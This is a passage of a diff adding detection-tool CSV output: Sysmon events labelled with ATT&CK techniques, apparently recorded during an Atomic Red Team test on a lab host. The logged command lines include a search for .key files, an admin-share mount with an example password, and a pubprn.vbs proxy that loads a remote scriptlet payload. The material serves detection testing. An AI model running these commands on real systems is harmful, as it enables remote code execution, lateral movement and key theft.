+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;dir c:\ /b /s .key | findstr /e .key&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547737.524876,2019-07-19T18:48:57.524876+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;echo &quot; &quot;ATOMICREDTEAM &gt; %%windir%%\cert.key&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:57.466584Z"">
+    </TimeCreated>
+    <EventRecordID>3676</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:57.433</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D859-5D31-0000-0010E68C2F00</Data>
+    <Data Name=""ProcessId"">6524</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;echo &quot; &quot;ATOMICREDTEAM &gt; %%windir%%\cert.key&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547737.466584,2019-07-19T18:48:57.466584+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:46.238056Z"">
+    </TimeCreated>
+    <EventRecordID>3675</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:46.221</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D84E-5D31-0000-00102C702F00</Data>
+    <Data Name=""ProcessId"">1628</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1077] Windows Admin Shares - Process - Created,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net  use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:41.109076Z"">
+    </TimeCreated>
+    <EventRecordID>3674</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:41.103</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D849-5D31-0000-00103C522F00</Data>
+    <Data Name=""ProcessId"">6068</Data>
+    <Data Name=""Image"">C:\Windows\System32\net.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Net Command</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">net  use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D849-5D31-0000-0010E54F2F00</Data>
+    <Data Name=""ParentProcessId"">3284</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd.exe  /c  net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1077] Windows Admin Shares - Network,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net  use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:41.109076Z"">
+    </TimeCreated>
+    <EventRecordID>3674</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:41.103</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D849-5D31-0000-00103C522F00</Data>
+    <Data Name=""ProcessId"">6068</Data>
+    <Data Name=""Image"">C:\Windows\System32\net.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Net Command</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">net  use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D849-5D31-0000-0010E54F2F00</Data>
+    <Data Name=""ParentProcessId"">3284</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd.exe  /c  net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547721.109076,2019-07-19T18:48:41.109076+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe  /c  net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:41.085108Z"">
+    </TimeCreated>
+    <EventRecordID>3673</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:41.068</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D849-5D31-0000-0010E54F2F00</Data>
+    <Data Name=""ProcessId"">3284</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe  /c  net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D849-5D31-0000-0010914D2F00</Data>
+    <Data Name=""ParentProcessId"">2096</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c &quot; net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547721.085108,2019-07-19T18:48:41.085108+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c &quot; net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:41.050661Z"">
+    </TimeCreated>
+    <EventRecordID>3672</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:41.034</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D849-5D31-0000-0010914D2F00</Data>
+    <Data Name=""ProcessId"">2096</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cmd.exe /c &quot; net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547717.347265,2019-07-19T18:48:37.347265+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:37.264352Z"">
+    </TimeCreated>
+    <EventRecordID>3670</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:37.099</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D845-5D31-0000-001098212F00</Data>
+    <Data Name=""ProcessId"">2624</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1563547717.264352,2019-07-19T18:48:37.264352+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript.exe  /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost  script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost &quot; script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) in directory : ( C:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:36.882586Z"">
+    </TimeCreated>
+    <EventRecordID>3669</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:36.869</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D844-5D31-0000-0010C70A2F00</Data>
+    <Data Name=""ProcessId"">2484</Data>
+    <Data Name=""Image"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""FileVersion"">5.812.10240.16384</Data>
+    <Data Name=""Description"">Microsoft ® Console Based Script Host</Data>
+    <Data Name=""Product"">Microsoft ® Windows Script Host</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cscript.exe  /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost  script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D844-5D31-0000-001075082F00</Data>
+    <Data Name=""ParentProcessId"">7140</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost &quot; script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547716.882586,2019-07-19T18:48:36.882586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost &quot; script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:48:36.834888Z"">
+    </TimeCreated>
+    <EventRecordID>3668</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:48:36.811</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D844-5D31-0000-001075082F00</Data>
+    <Data Name=""ProcessId"">7140</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost &quot; script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547716.834888,2019-07-19T18:48:36.834888+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
